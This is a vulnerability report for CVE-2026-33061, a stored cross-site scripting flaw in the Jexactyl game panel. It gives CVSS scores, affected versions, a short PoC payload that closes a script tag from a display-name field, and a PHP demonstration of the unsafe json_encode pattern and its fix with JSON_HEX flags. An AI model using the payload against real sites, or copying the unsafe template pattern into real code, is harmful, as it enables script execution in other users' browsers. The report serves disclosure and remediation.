Security Vulnerability Report
CVE-2026-33061 CVSS 5.8 MEDIUM

Published: 2026-03-20 08:16:12
Last Modified: 2026-04-14 17:56:39

Description

Jexactyl is a customisable game management panel and billing system. Commits after 025e8dbb0daaa04054276bda814d922cf4af58da and before e28edb204e80efab628d1241198ea4f079779cfd inject server-side objects into client-side JavaScript through resources/views/templates/wrapper.blade.php. Using unescaped {!! json_encode(...) !!} without safe encoding flags allows string values to break out of the JavaScript context and be interpreted as HTML/JS by the browser. If any serialized fields contain attacker-controlled content, such as a username, display name, or site config value, a malicious payload will execute arbitrary script for any user viewing the page (stored DOM XSS). This issue has been patched by commit e28edb204e80efab628d1241198ea4f079779cfd.

CVSS Details

Two CVSS 3.1 assessments are recorded for this CVE (both MEDIUM). The 5.8 in the header is the Secondary vector supplied by the reporting source; NVD's Primary analysis rates the issue 5.4 with a network attack vector, low privileges and a scope change. The Primary vector is the one that matches the attack path in the description (a low-privileged panel user sets a display name over the network, and the script runs in other users' browsers), so use it for triage rather than the AV:L/PR:H Secondary vector.

CVSS Score (Secondary)
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

CVSS Score (Primary, NVD)
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation, cross-site scripting)

Configurations (Affected Products)

cpe:2.3:a:jexactyl:jexactyl:*:*:*:*:*:*:*:* (versions up to and including 3.8.0) - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta7:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:jexactyl:jexactyl:4.0.0:rc2:*:*:*:*:*:* - VULNERABLE
Jexactyl (commits after 025e8dbb0daaa04054276bda814d922cf4af58da)
Jexactyl (commits before e28edb204e80efab628d1241198ea4f079779cfd)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Payload to inject into a user-controlled field (e.g., username or display name).
// The application uses {!! json_encode($user) !!} in wrapper.blade.php;
// this payload breaks out of the JSON string context in the browser.
const maliciousUsername = "</script><script>alert('CVE-2026-33061 XSS');</script>";

// Explanation:
// 1. The attacker sets their display name to the string above.
// 2. The server stores it in the database.
// 3. When the page renders, the output becomes:
//      var user = {"name": "</script><script>alert('CVE-2026-33061 XSS');</script>"};
// 4. The browser sees the closing </script> tag, ends the current script block,
//    and immediately executes the new script block containing the alert.
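The following PHP example is added to this report and is not Jexactyl's code. It reproduces the pattern the description and the PoC above refer to (a server-side array serialised with json_encode() straight into an inline script block) using a constructed display name, and shows what the "safe encoding flags" mentioned in the description change. The names $user, window.User, renderInlineScript() and containsScriptBreakout() are illustrative. One caveat a tester should know before relying on the payload above: PHP's json_encode() escapes "/" as "\/" by default, so a literal "</script>" only survives into the page when the call site passes JSON_UNESCAPED_SLASHES; the advisory does not say which flags the affected template used. Encoding "<" and ">" themselves, as the hardened form does, removes that dependency.

```php
<?php
// Added example for this report, not Jexactyl's code. Reproduces the
// {!! json_encode(...) !!}-into-<script> pattern with a constructed attacker
// string and shows the effect of JSON_HEX_* flags. All names are illustrative.

declare(strict_types=1);

// Constructed attacker-controlled input of the kind the advisory names
// (username / display name / site config value).
$user = [
    'name'  => "</script><script>alert('xss')</script>",
    'email' => 'attacker@example.invalid',
];

// Render a value the way an unescaped {!! json_encode(...) !!} does inside an
// inline <script> element. $flags is whatever the template passes to json_encode().
function renderInlineScript(array $data, int $flags): string
{
    return '<script>window.User = ' . json_encode($data, $flags, 512) . ';</script>';
}

// The HTML tokenizer ends an inline script at the literal, case-insensitive
// characters "</script"; JSON string escapes mean nothing to it. So the test for
// a breakout is simply whether those characters occur inside the payload.
function containsScriptBreakout(string $html): bool
{
    // Drop the wrapper's own <script>...</script> so only the payload is inspected.
    $inner = substr($html, strlen('<script>'), -strlen('</script>'));
    return stripos($inner, '</script') !== false;
}

// 1. Vulnerable pattern. json_encode() escapes '/' as '\/' by default, which happens
//    to neutralise this exact payload; JSON_UNESCAPED_SLASHES (a common addition
//    for "cleaner" output) puts a literal </script> back into the page.
$unsafe = renderInlineScript($user, JSON_UNESCAPED_SLASHES);
echo "unescaped slashes, no HEX flags -> breakout: ",
     var_export(containsScriptBreakout($unsafe), true), PHP_EOL;

// 2. Hardened. JSON_HEX_TAG turns '<' into \u003C and '>' into \u003E, JSON_HEX_AMP
//    '&' into \u0026, JSON_HEX_APOS "'" into \u0027, JSON_HEX_QUOT '"' into \u0022.
//    JavaScript restores the characters when it decodes the string literal, but the
//    HTML tokenizer never sees a '<', so no tag can start whatever the slash setting.
$hexFlags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
$safe = renderInlineScript($user, $hexFlags | JSON_UNESCAPED_SLASHES);
echo "HEX flags -> breakout: ",
     var_export(containsScriptBreakout($safe), true), PHP_EOL;

// 3. Decoding the hardened output in a JSON parser shows the data is intact: the
//    application still receives the original string, only its HTML form changed.
$roundTrip = json_decode(json_encode($user, $hexFlags), true, 512, JSON_THROW_ON_ERROR);
echo "round-trip preserves the value: ",
     var_export($roundTrip['name'] === $user['name'], true), PHP_EOL;

// 4. In a Blade view the same flags come from the @json directive, which passes
//    JSON_HEX_TAG|JSON_HEX_APOS|JSON_HEX_AMP|JSON_HEX_QUOT to json_encode(), or from
//    Illuminate\Support\Js::from() in newer Laravel releases, so the template fix is:
//        window.User = {!! json_encode($user) !!};   // before
//        window.User = @json($user);                 // after
```

Run it with `php example.php`; the first check reports true (breakout), the other two false and true. Encoding "<" rather than relying on "\/" also covers the "<!--" and "<script" sequences that can push the HTML parser into its escaped script-data states, which is why JSON_HEX_TAG, not JSON_UNESCAPED_SLASHES, is the setting to audit for when reviewing other templates in the same codebase.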

References

https://github.com/Jexactyl/Jexactyl/commit/e28edb204e80efab628d1241198ea4f079779cfd (Patch)
https://github.com/Jexactyl/Jexactyl/security/advisories/GHSA-6xgw-mmmv-57h2 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33061", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:12.090", "lastModified": "2026-04-14T17:56:38.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jexactyl is a customisable game management panel and billing system. Commits after 025e8dbb0daaa04054276bda814d922cf4af58da and before e28edb204e80efab628d1241198ea4f079779cfd inject server-side objects into client-side JavaScript through resources/views/templates/wrapper.blade.php. Using unescaped {!! json_encode(...) !!} without safe encoding flags allows string values to break out of the JavaScript context and be interpreted as HTML/JS by the browser. If any serialized fields contain attacker-controlled content, such as a username, display name, or site config value, a malicious payload will execute arbitrary script for any user viewing the page (stored DOM XSS). This issue has been patched by commit e28edb204e80efab628d1241198ea4f079779cfd."}, {"lang": "es", "value": "exactyl es un panel de gestión de juegos y sistema de facturación personalizable. Commits después de 025e8dbb0daaa04054276bda814d922cf4af58da y antes de e28edb204e80efab628d1241198ea4f079779cfd inyectan objetos del lado del servidor en JavaScript del lado del cliente a través de resources/views/templates/wrapper.blade.php. Usar {!! json_encode(...) !!} sin escapar y sin banderas de codificación segura permite que los valores de cadena salgan del contexto de JavaScript y sean interpretados como HTML/JS por el navegador. Si algún campo serializado contiene contenido controlado por el atacante, como un nombre de usuario, nombre de visualización o valor de configuración del sitio, una carga útil maliciosa ejecutará un script arbitrario para cualquier usuario que vea la página (XSS DOM almacenado). 
Este problema ha sido parcheado por el commit e28edb204e80efab628d1241198ea4f079779cfd."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.8.0", "matchCriteriaId": "6C552E32-4BAD-440D-B29A-B2E02246AE20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "08A85D83-EB57-4B0B-B35F-0CCAAA46E973"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7916B5CF-2EB4-46CC-A1B9-A2923509D81D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "3F082307-4A99-4365-9931-9D8948C998D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta4:*:*:*:*:*:*", "matchCriteriaId": 
"7373C273-098A-41E1-A8A8-CAB1358B828A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "3967F8B9-EFB8-4B74-AF96-DDE4D81D91BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "E1EFCCD5-7C2A-478D-A484-81007FE6FB19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "887913CA-22D9-489C-8B13-3D52CA759405"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "E4878F19-2FBC-4230-A944-9F87B31B1C96"}, {"vulnerable": true, "criteria": "cpe:2.3:a:jexactyl:jexactyl:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "C3A132E3-C73F-4783-AA85-A1222BA437BF"}]}]}], "references": [{"url": "https://github.com/Jexactyl/Jexactyl/commit/e28edb204e80efab628d1241198ea4f079779cfd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Jexactyl/Jexactyl/security/advisories/GHSA-6xgw-mmmv-57h2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/J ... (truncated)